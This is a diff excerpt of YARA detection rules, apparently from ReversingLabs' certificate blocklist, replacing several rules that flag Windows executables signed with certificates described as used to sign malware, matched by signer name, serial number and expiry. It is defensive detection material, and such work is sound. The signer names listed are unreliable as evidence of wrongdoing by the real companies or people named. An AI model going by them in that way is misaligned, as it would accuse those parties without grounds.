@@ -20407,21 +45072,21 @@ rule REVERSINGLABS_Cert_Blocklist_76D8D908Eed2F9857Dc5676A680Ceac9 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "76:d8:d9:08:ee:d2:f9:85:7d:c5:67:6a:68:0c:ea:c9" and 1467158400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Farad LLC" and pe.signatures [ i ] . serial == "0a:5b:4f:67:ad:8b:22:af:c2:de:be:6c:e5:f8:f6:79" and 1607472000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_083E3F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Df45B36C9D0Bd248C3F9494E7Ca822 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b9a1b1a7-2333-5a6f-85c9-6c19d34c4aa4"
+		id = "d7d0d1c4-b341-5651-8179-4035f537ba98"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15774-L15790"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6977d48a2e31235d780cba1b84b39a90e409ee8ea5555e01cbc34989ecd3882d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8786-L8804"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9c03522376b0d807cd36a0641e474d770bc3b4f8221f26d232878d2d320d072b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20431,21 +45096,21 @@ rule REVERSINGLABS_Cert_Blocklist_083E3F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Telefonicasa" and pe.signatures [ i ] . serial == "08:3e:3f" and 999002664 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MPO STORITVE d.o.o." and ( pe.signatures [ i ] . serial == "00:df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22" or pe.signatures [ i ] . serial == "df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22" ) and 1619740800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_79227311Acdd575759198Dbd3544Cca7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Ae3C4Eccecda2127D43Be390A850Dda : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "350f7c25-f20f-5e8f-aa52-163cf3de3be1"
+		id = "a9d8906b-64f6-5c5d-80e0-ab916e83b613"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15792-L15808"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "73e920d51faf7150329ce189d1693c29a2285a02d54fee27e5af5afe3238295b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8806-L8822"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8a2ff4f7a5ac996127778b1670e79291bddcb5dee6e7da2b540fd254537ee27e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20455,21 +45120,21 @@ rule REVERSINGLABS_Cert_Blocklist_79227311Acdd575759198Dbd3544Cca7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "79:22:73:11:ac:dd:57:57:59:19:8d:bd:35:44:cc:a7" and 1478131200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PARTYNET LIMITED" and pe.signatures [ i ] . serial == "1a:e3:c4:ec:ce:cd:a2:12:7d:43:be:39:0a:85:0d:da" and 1614902400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_13Ae38C9Ae21A8576C0D024D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2E36360538624C9B1Afd78A2Fb756028 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "416c5eb3-bc6d-5fb0-a7fe-58cdd6c7c39d"
+		id = "549a566b-0c94-516c-9231-a5e54136785f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15810-L15826"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7be892eaf9e2e31442f7ef5ffd296dd17696d6c95d20eb2758ede2c553b05f38"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8824-L8840"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9cbb50c7d383048fd506506fa9ee8bf7c6d82feaf21bcde4008ab99b82e234a7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20479,21 +45144,21 @@ rule REVERSINGLABS_Cert_Blocklist_13Ae38C9Ae21A8576C0D024D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "13:ae:38:c9:ae:21:a8:57:6c:0d:02:4d" and 1475062802 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ts Trade ApS" and pe.signatures [ i ] . serial == "2e:36:36:05:38:62:4c:9b:1a:fd:78:a2:fb:75:60:28" and 1615766400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_557B0Abf44045827F1F36Efbc96271Ec : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Addb899F8229Fd53E6435E08Bbd3A733 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "64db0b43-b73f-594d-9f04-2cdf76df7c9b"
+		id = "1e5f0577-ba05-5e43-a817-c75f65547c3d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15828-L15844"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "633e8d6b44d62443d991738fa82b9742ac5634051bba5d0cdb3d6b35d66bdc8f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8842-L8860"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ecb8e31b8c56b92cef601618e0adc2f6d88999318805b92389693aa9e8050d18"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20503,21 +45168,21 @@ rule REVERSINGLABS_Cert_Blocklist_557B0Abf44045827F1F36Efbc96271Ec : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "55:7b:0a:bf:44:04:58:27:f1:f3:6e:fb:c9:62:71:ec" and 1480291200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "U.K. STEEL EXPORTS LIMITED" and ( pe.signatures [ i ] . serial == "00:ad:db:89:9f:82:29:fd:53:e6:43:5e:08:bb:d3:a7:33" or pe.signatures [ i ] . serial == "ad:db:89:9f:82:29:fd:53:e6:43:5e:08:bb:d3:a7:33" ) and 1616630400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7903870184E18A80899740845A15E2B2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C1A1Db95D7Bf80290Aa6E82D8F8F996A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a55bed5b-906f-5c9d-bddd-b4d53d6351de"
+		id = "c04a2731-5eb8-5db4-9e88-cab9b61952e4"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15846-L15862"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ad32491b463d0b3b4c85ed78e81bb69802e5f90ae835f73e270b28f02b36f840"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8862-L8880"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "84c7c0e53facadcdfd752e9cf3811fbfd6aac4bef4109acf430a67b6dcd37bfc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20527,21 +45192,21 @@ rule REVERSINGLABS_Cert_Blocklist_7903870184E18A80899740845A15E2B2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Qool Aid, LLC" and pe.signatures [ i ] . serial == "79:03:87:01:84:e1:8a:80:89:97:40:84:5a:15:e2:b2" and 1079654400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Software Two Pty Ltd" and ( pe.signatures [ i ] . serial == "00:c1:a1:db:95:d7:bf:80:29:0a:a6:e8:2d:8f:8f:99:6a" or pe.signatures [ i ] . serial == "c1:a1:db:95:d7:bf:80:29:0a:a6:e8:2d:8f:8f:99:6a" ) and 1615334400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5Fba9B373F812C16Aef531D4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C667Ffe3A5B0A5Ae7Cf3A9E41682E91B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "129e981a-064a-5930-bd45-d03ed008451c"
+		id = "83a5e5c2-0932-526b-80aa-800b37088bbd"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15864-L15880"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8b7340359778e3aa56f6ea300973af74eb77efd54108d2ca2b6b8f04d89a1c39"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8882-L8900"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "be2cd688f2d7c458ee764bd7a7250e0116328702db5585b444d631f05cdc701b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20551,21 +45216,21 @@ rule REVERSINGLABS_Cert_Blocklist_5Fba9B373F812C16Aef531D4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "5f:ba:9b:37:3f:81:2c:16:ae:f5:31:d4" and 1473329076 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and ( pe.signatures [ i ] . serial == "00:c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" or pe.signatures [ i ] . serial == "c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" ) and 1616976000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_616A5205238590B01D7B761E444E4Ad9 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E0A83917660D05Cf476374659D3C7B85 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "09e9e481-c767-53d3-9af1-11dec636cafb"
+		id = "3387f396-01f7-58b1-a5bd-b308105c66d6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15882-L15898"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "463ccd3ace9021569a7a6d5fcbaadf34b15d2b07baf3df526b271b547cf2bbc5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8902-L8920"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f60753ecb775d664e07e78611568799eaf06fb4742bcef3bf0c28202daf98c50"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20575,21 +45240,21 @@ rule REVERSINGLABS_Cert_Blocklist_616A5205238590B01D7B761E444E4Ad9 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lerges" and pe.signatures [ i ] . serial == "61:6a:52:05:23:85:90:b0:1d:7b:76:1e:44:4e:4a:d9" and 1421452800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PIK MOTEL S.R.L." and ( pe.signatures [ i ] . serial == "00:e0:a8:39:17:66:0d:05:cf:47:63:74:65:9d:3c:7b:85" or pe.signatures [ i ] . serial == "e0:a8:39:17:66:0d:05:cf:47:63:74:65:9d:3c:7b:85" ) and 1621468800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_29Be2278113Dd062Eadca32De6B242D0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Afc5522898143Aafaab7Fd52304Cf00C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a2dfd6e0-4475-537a-859e-126dd4a02af7"
+		id = "016ad027-bd6a-58e0-9099-341b81dd6f70"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15900-L15916"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3df7afba9eda9022a64647ce2a91119d0bdf6fe5b164a1e82b1819409024fbee"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8922-L8940"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bfcf2fbbd9be97202eeb44c0f81f0a0713d4d30c466f2b170231c7f9df0e9e6d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20599,21 +45264,21 @@ rule REVERSINGLABS_Cert_Blocklist_29Be2278113Dd062Eadca32De6B242D0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BLADES" and pe.signatures [ i ] . serial == "29:be:22:78:11:3d:d0:62:ea:dc:a3:2d:e6:b2:42:d0" and 1536883200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YAN CHING LIMITED" and ( pe.signatures [ i ] . serial == "00:af:c5:52:28:98:14:3a:af:aa:b7:fd:52:30:4c:f0:0c" or pe.signatures [ i ] . serial == "af:c5:52:28:98:14:3a:af:aa:b7:fd:52:30:4c:f0:0c" ) and 1622419200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_05F70A557Afd4A443F44D0Baf0Bc8C60 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8B3333D32B2C2A1D33B41Ba5Db9D4D2D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9ce5b6c7-fede-508f-a7d0-f9d0b8838645"
+		id = "f7f72cd2-0bf4-5aa7-804e-4ae354eda055"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15918-L15934"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3945f515b65ca3ffb6c2b64c884bb2790d703a277e1a5ba128c81bc63ed20a25"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8942-L8960"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cdb3f1983ed17df22d17c6321bc2ead2c391d70fdca4a9f6f4784f62196b85d0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20623,21 +45288,21 @@ rule REVERSINGLABS_Cert_Blocklist_05F70A557Afd4A443F44D0Baf0Bc8C60 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "05:f7:0a:55:7a:fd:4a:44:3f:44:d0:ba:f0:bc:8c:60" and 1477440000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOOK CAF\\xC3\\x89, s.r.o." and ( pe.signatures [ i ] . serial == "00:8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" or pe.signatures [ i ] . serial == "8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" ) and 1620000000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4E0665D61997072294A70C662F72Eae3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fbb1198Bd8Bddb0D693Eb72A8613Fe3F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1370a3b5-a254-5197-ac85-5b33e8d9fa38"
+		id = "f9983426-9f05-56e2-8ad0-1c5a48ab04be"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15936-L15952"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f07cdfd522db0a92fe1dba30f158b2c89bb5424bdcdfda50ae42fcfddeac19ba"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8962-L8980"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2e004116d0f8df5a625b190127655926336fc74b4cce4ae40cd516a135e5d719"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20647,21 +45312,21 @@ rule REVERSINGLABS_Cert_Blocklist_4E0665D61997072294A70C662F72Eae3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "4e:06:65:d6:19:97:07:22:94:a7:0c:66:2f:72:ea:e3" and 1474502400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade Hunters, s. r. o." and ( pe.signatures [ i ] . serial == "00:fb:b1:19:8b:d8:bd:db:0d:69:3e:b7:2a:86:13:fe:3f" or pe.signatures [ i ] . serial == "fb:b1:19:8b:d8:bd:db:0d:69:3e:b7:2a:86:13:fe:3f" ) and 1620000000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_74702Dff5D4056B847D009A2265Fb1B3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_846F77D9919Fc4405Aefe1701309Bd67 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "55f1e321-ce70-519a-9a39-4278162edbef"
+		id = "c326fbf0-2d95-5aa1-9ae4-6cb04b9c2212"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15954-L15970"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8acc57bbf334a48043dbee6fab7b7a54a44801b2ccd0ccd9d14194689c75c021"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8982-L9000"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6739049a61183d506daf9aaf44a3b15cbf2234c6af307ec95bc07fa3d8501105"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20671,21 +45336,21 @@ rule REVERSINGLABS_Cert_Blocklist_74702Dff5D4056B847D009A2265Fb1B3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shulan Hou" and pe.signatures [ i ] . serial == "74:70:2d:ff:5d:40:56:b8:47:d0:09:a2:26:5f:b1:b3" and 1469664000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IPM Skupina d.o.o." and ( pe.signatures [ i ] . serial == "00:84:6f:77:d9:91:9f:c4:40:5a:ef:e1:70:13:09:bd:67" or pe.signatures [ i ] . serial == "84:6f:77:d9:91:9f:c4:40:5a:ef:e1:70:13:09:bd:67" ) and 1621382400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_353B1Cf7866Ee0B0Acdd532D0Bb1A220 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0939C2Bad859C0432E8E98A6C0162C02 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "20b95b80-94a9-51c3-9c6c-2a0ef75b0c0b"
+		id = "5dba4570-51d8-5c23-85a5-5de9a048793f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15972-L15988"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "aa8f0fe1517134b6e562c2accc46420a4f0afd77c3a7bbe98d551c54e68ed4c7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9002-L9018"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3c48241e52e58600bfa0385742831dba59d9cbd959cd6853fe8e030f5df79c23"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20695,21 +45360,21 @@ rule REVERSINGLABS_Cert_Blocklist_353B1Cf7866Ee0B0Acdd532D0Bb1A220 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Network Freak Limited" and pe.signatures [ i ] . serial == "35:3b:1c:f7:86:6e:e0:b0:ac:dd:53:2d:0b:b1:a2:20" and 1558915200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Activ Expeditions ApS" and pe.signatures [ i ] . serial == "09:39:c2:ba:d8:59:c0:43:2e:8e:98:a6:c0:16:2c:02" and 1615939200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_093Ff2870Fa33Eaf47259457Ee58C2E0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Fba0E19919Ac50D700Ba60250D02C8B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3fd458e6-bf5a-51f3-9b46-344e9f8e0ffe"
+		id = "8828c863-2800-5f66-968e-96a41a071218"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15990-L16006"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1aafe547b8645f07498bac6f0ffd6d5aefbac160aa7a6fb8d1d891e70701ce99"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9020-L9036"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
